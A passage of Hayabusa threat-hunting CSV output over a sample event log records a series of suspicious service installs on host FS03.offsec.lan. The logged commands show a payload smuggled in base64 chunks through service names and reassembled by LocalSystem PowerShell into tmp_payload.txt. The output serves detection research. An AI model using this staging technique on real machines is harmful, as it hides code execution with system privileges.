VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:16.058 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:17.508 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:17.508 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:17.508 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:18.961 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:18.961 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:18.961 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:20.414 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:20.414 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:20.414 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:21.867 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:21.867 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:21.867 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:23.325 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:23.325 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:23.325 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:24.762 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:24.762 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:24.762 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:26.229 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:26.229 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:26.229 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:27.683 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:27.683 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:27.683 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:29.154 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:29.154 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:29.154 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:30.607 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:30.607 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:30.607 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:32.038 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:32.038 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:32.038 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:17:33.491 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:33.491 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:33.491 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append 